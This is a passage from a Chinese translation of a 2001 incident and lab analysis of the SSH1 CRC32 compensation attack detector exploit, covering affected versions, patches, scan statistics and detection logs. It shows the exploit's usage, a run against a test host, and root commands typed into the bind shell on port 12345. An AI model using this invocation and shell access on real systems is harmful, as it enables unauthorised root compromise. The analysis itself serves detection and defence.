分享
 
 
 

对于SSH crc32 compensation attack detector exploit 的分析

王朝other·作者佚名  2008-06-01
窄屏简体版  字體: |||超大  

由于SSH crc32 compensation attack detector eXPloit代码的流传开来,对于

SSH的扫描也越来越多,这是一份统计报表:

+------------+------------+----------+----------+-----------+

| date | #Probes| #Sources | #Targets | #Scanners |

+------------+------------+----------+----------+-----------+

| 2001-10-03 | 1466 |45|987 | |

| 2001-10-04 |319 |25|212 | |

| 2001-10-05 |825 |22|783 | |

| 2001-10-06 |86552 |27|86305 | |

| 2001-10-07 | 7564 |29| 7429 | |

| 2001-10-08 | 2506 |29| 2449 | |

| 2001-10-09 | 1010 |18|263 | |

| 2001-10-10 |480 |39|307 | |

| 2001-10-11 |978 |31|504 | |

| 2001-10-12 |436 |21|311 | |

| 2001-10-13 | 6731 |27| 6353 | |

| 2001-10-14 | 1411 |29| 1084 | |

| 2001-10-15 |936 |34|723 | |

| 2001-10-16 | 1358 |40| 1256 | |

| 2001-10-17 | 1098 |36|899 | |

| 2001-10-18 | 1779 |31| 1438 | |

| 2001-10-19 |19722 |28|19573 | 7 |

| 2001-10-20 |25539 |21|25419 | 3 |

| 2001-10-21 | 6796 |26| 6750 | 9 |

| 2001-10-22 |807 |30|482 | 5 |

| 2001-10-23 |578 |49|327 | 6 |

| 2001-10-24 | 2198 |39| 2025 | 9 |

| 2001-10-25 | 2368 |31| 1759 | 6 |

| 2001-10-26 |712 |37|591 | 7 |

| 2001-10-27 |463 |30|297 | 8 |

| 2001-10-28 |495 |30|263 | 5 |

| 2001-10-29 |478 |37|399 | 5 |

| 2001-10-30 | 1154 |48| 1051 | 5 |

| 2001-10-31 | 1998 |46| 1047 | 5 |

| 2001-11-01 |66660 |46|66386 | 5 |

| 2001-11-02 | 1514 |40|926 | 5 |

| 2001-11-03 | 2142 |36| 2047 | 8 |

| 2001-11-04 | 1233 |26|781 | 9 |

+------------+------------+----------+----------+-----------+

鉴于此情况,编译整理David A. Dittrich <dittrich@cac.washington.edu> 文章(http://staff.washington.edu/dittrich/misc/ssh-analysis.txt)供大家参考和修补。

-------------------------------------------------------------------------------

概述

==================

此漏洞最开始由CORE-SDI组织在securityfocus.com上的BUGTRAQ上发布了他们安全

公告CORE-20010207,日期为2001,2月8号:

http://www.securityfocus.com/advisories/3088

漏洞的简单描述就是:ssh1守护程序中所带的一段代码中存在一个整数溢出问题。问题出在

deattack.c,此程序由CORE SDI开发,用来防止SSH1协议受到CRC32补偿攻击。

由于在detect_attack()函数中错误的将一个16位的无符号变量当成了32位变量来使用,导致表索引溢出问题。

这将答应一个攻击者覆盖内存中的任意位置的内容,攻击者可能远程获取root权限。

其他组织也陆续公布了一些对这个SSH 漏洞的分析和建议如:

 http://xforce.iss.net/alerts/advise100.PHP

 http://razor.bindview.com/publish/advisories/adv_ssh1crc.Html

 http://www.securityfocus.com/bugid=2347

而在2001年10月21号Jay Dyson在incidents@securityfocus.com邮件列表上声明

有不少信息显示有人在扫描RIPE 网络段的SSH服务器:

 http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1

然后更甚的是在vuln-dev@securityfocus.com邮件列表中提示Newsbytes.com中

有新闻描述有人愿付$1000美金的人提供此攻击工具。还有没有确认的传闻针对

Solaris 8/SPARC SSH.com 1.2.26-31 系统的攻击代码也存在。闻名的安全站点

securitynewsportal.com就被这个漏洞攻击,下面地址是被黑截图:

 http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/

最近TESO发布了关于这些攻击代码的信息,你可以在下面的地址查看:

 http://www.team-teso.org/sshd_statement.php

下面是受影响的SSH版本:

SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled)

SSH Communications Security SSH 1.2.23-1.2.31

F-Secure SSH versions prior to 1.3.11-2

OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled)

OSSH 1.5.7

不过供给商已经为系统提供补丁信息,大家可以参考如下地址:

 http://www.ssh.com/prodUCts/ssh/advisories/ssh1_crc-32.cfm

 http://openssh.org/security.html

 http://www.cisco.com/warp/public/707/SSH-multiple-pub.html

---------------------------------------------------------------------------

攻击行为的分析

=====================

2001年10月6日,攻击者从Netherlands网络段使用crc32 compensation attack

detector漏洞攻击程序入侵了一台UW网络中使用了OpenSSH 2.1.1的Redhat Linux

系统,漏洞描述如CERT VU#945216所述:

 http://www.kb.cert.org/vuls/id/945216

系统中一系列操作系统命令被替换成木马程序以提供以后再次进入并清除了所有

日志系统。第二台SSH服务器运行在39999/tcp高端口,系统入侵后被用来扫描其他

UW以外的网络以获得更多的运行OpenSSH 2.1.1的系统。

通过一些恢复操作对这个漏洞程序进行了分析:

这个攻击代码基于OpenSSH 2.2.0版本(这个是2.1.1之后的版本,对crc32

compensation attack detection function进行了修补),不过针对OpenSSH

2.1.1进行攻击,其攻击代码也可以使用在ssh.com 1.2.31版本(针对其他SSH

协议1 和版本的测试尚无完成)。

攻击代码对针对如下系统:

 linux/x86 ssh.com 1.2.26-1.2.31 rhl

 linux/x86 openssh 1.2.3 (maybe others)

 linux/x86 openssh 2.2.0p1 (maybe others)

 freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl

虽然这个攻击代码可以对多个平台系统进行攻击,这里攻击者只扫描22/tcp端口,

然后连接这些系统获得响应的版本程序并只对"OpenSSH_2.1.1"继续进一步操作。

这些扫描使用快速SYN扫描,使用来自t0rn root kit中的工具。

对破坏的系统进行分析发现已经有47067个地址被扫描,而在这些地址中,有1244

个主机被鉴别存在此漏洞,攻击者成功的在8月8日系统离线之前利用此漏洞进入

4个主机。

这个攻击者代码对使用访问控制限制(如, SSH.com的"AllowHosts" 或者 "DenyHosts"

设置) 或者包过滤(如, ipchains, iptables, ipf) 的系统不能正常工作,因为这些

会要求交换Public keys。

-------------------------------------------------------------------------

对攻击者代码实时的分析

============================

此攻击代码在隔离的网络段进行测试,使用了网络地址为10.10.10.0/24,攻击

主机使用了10.10.10.10 而有漏洞的服务主机为 10.10.10.3。

有漏洞的服务主机系统运行了在Red Hat Linux6.0(Kernel 2.2.16-3 on an i586)

的SSH.com的 1.2.31 版本。

而攻击主机运行了Fred Cohen's PLAC[1] (从CD-ROM引导的Linux 2.4.5 系统),

文件使用"nc"(Netcat)[2]拷贝到系统中.

攻击一方再现

=========================

当以没有任何参数运行攻击代码的时候会显示使用信息:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

root@plac /bin >> ./ssh

linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from

openssh 2.2.0 src

greets: mray, random, big t, sh1fty, scut, dvorak

ps. this sploit already owned cia.gov :/

**please pick a type**

Usage: ./ssh host [options]

Options:

-p port

-b base Base address to start bruteforcing distance, by default 0x1800,

goes as high as 0x10000

-t type

-d debug mode

-o Add this to delta_min

types:

0: linux/x86 ssh.com 1.2.26-1.2.31 rhl

1: linux/x86 openssh 1.2.3 (maybe others)

2: linux/x86 openssh 2.2.0p1 (maybe others)

3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

被测试系统在系统端口2222上运行着SSH.com version 1.2.31 (未修补)程序,并

把syslog日志重定向独立的文件sshdx.log.

这里选择了类型type 0和2222 攻击端口:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0

linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from

openssh 2.2.0 src

greets: mray, random, big t, sh1fty, scut, dvorak

ps. this sploit already owned cia.gov :/

...........................

bruteforced distance: 0x3200

bruteforcing distance from h->partial packet buffer on stack

..............^[[A................|////////\\\\!

bruteforced h->ident buff distance: 5bfbed88

trying retloc_delta: 35

....!

found high Words of possible return address: 808

trying to exploit

....

trying retloc_delta: 37

.!

found high words of possible return address: 805

trying to exploit

....

trying retloc_delta: 39

......

trying retloc_delta: 3b

......

trying retloc_delta: 3d

!

found high words of possible return address: 804

trying to exploit

....

trying retloc_delta: 3f

......

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

这里看来,攻击攻击相似被"停止"了,返回被攻击系统查看却发现被开了后门。

被测试系统一方再现

=======================

在利用漏洞之前,被测试系统显示标准SSH守护程序运行在22/tcp端口,要被

测试的应用程序运行在2222/tcp端口,两个都在监听状态,而且标准SSH守护

程序有一个外部连接(10.10.10.2:33354),通过netstat查看如下:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[root@victim /root]# netstat -an --inet

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN

tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

raw 0 0 0.0.0.0:1 0.0.0.0:* 7

raw 0 0 0.0.0.0:6 0.0.0.0:* 7

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

而在攻击程序"停止"以后,再用netstat查看网络监听状态如下:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[root@victim /root]# netstat -an --inet

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN

tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED

tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN

tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

raw 0 0 0.0.0.0:1 0.0.0.0:* 7

raw 0 0 0.0.0.0:6 0.0.0.0:* 7

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

发现有新的服务在12345/tcp端口监听。

返回攻击者主机,使用netstat查看网络状态,发现程序使用了暴力猜测地址

方式攻击:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[root@victim /root]# netstat -an --inet

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN

tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED

tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT

tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN

tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

raw 0 0 0.0.0.0:1 0.0.0.0:* 7

raw 0 0 0.0.0.0:6 0.0.0.0:* 7

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

而使用LiSt Open Files ("lsof")[4]工具显示被测试的SSH守护程序开启了一个

新的监听端口:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[root@victim /root]# lsof -p 9364

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

sshd 9364 root cwd DIR 3,3 1024 2 /

sshd 9364 root rtd DIR 3,3 1024 2 /

sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1

sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so

sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so

sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so

sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so

sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so

sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so

sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so

sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so

sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so

sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so

sshd 9364 root 0u CHR 1,3 4110 /dev/null

sshd 9364 root 1u CHR 1,3 4110 /dev/null

sshd 9364 root 2u CHR 1,3 4110 /dev/null

sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN)

sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

很明显,攻击程序成功利用此漏洞获得ROOT SHELL,并绑定了一个高端TCP端口。

这样攻击者可以使用任何"telnet"或者"rc"工具连接到此端口并以超级用户的

方式执行任意命令,如下所示:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

root@plac ~ >> telnet 10.10.10.3 12345

Trying 10.10.10.3...

Connected to 10.10.10.3.

Escape character is '^]'.

id;

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

date;

Thu Nov 1 18:04:42 PST 2001

netstat -an --inet;

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED

tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN

tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED

tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

raw 0 0 0.0.0.0:1 0.0.0.0:* 7

raw 0 0 0.0.0.0:6 0.0.0.0:* 7

exit;

Connection closed by foreign host.

root@plac ~ >>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[注重]:使用telnet要加";"号,而nc连接不需要。

等攻击者退出以后,被测试系统网络状态返回正常:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[root@victim /root]# netstat -an --inet

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN

tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

raw 0 0 0.0.0.0:1 0.0.0.0:* 7

raw 0 0 0.0.0.0:6 0.0.0.0:* 7

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

假如syslog日志功能开启了,连接和暴力测试的信息全部会记录下来(注重,这个是

对SSH.com 1.2.31在Red Hat LInux 6.0上的测试 -- 日志标志会和记录OpenSSH

不一样):

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298

Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299

Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300

Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301

Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302

Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303

Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304

Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305

Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.

Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306

Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.

Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307

Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308

Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309

Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310

Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311

Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312

Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313

Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314

Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.

Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315

Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316

Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317

Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318

Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319

Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320

Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321

Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322

Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323

Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324

Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325

Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326

Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327

Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328

Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329

Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330

Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331

Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332

Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333

Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334

Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335

Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336

Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337

Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338

Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339

Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340

Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341

Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342

Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343

Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.

Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344

Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345

Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346

Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347

Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348

Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349

Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350

Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351

Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352

Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353

Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354

Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355

Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356

Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357

Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358

Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359

Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360

Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361

Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362

Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363

Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364

Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365

Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366

Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367

Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368

Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369

Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370

Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371

Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372

Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373

Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374

Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375

Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376

Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377

Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378

Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379

Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380

Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381

Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382

Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383

Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384

Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385

Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386

Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387

Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388

Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389

Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390

Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391

Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392

Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393

Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.

Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394

Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395

Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396

Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397

Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398

Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.

Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399

Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400

Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401

Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

注重日志条目的最后一条,假如成功利用此漏洞被入侵,认证过程就会停止,因为

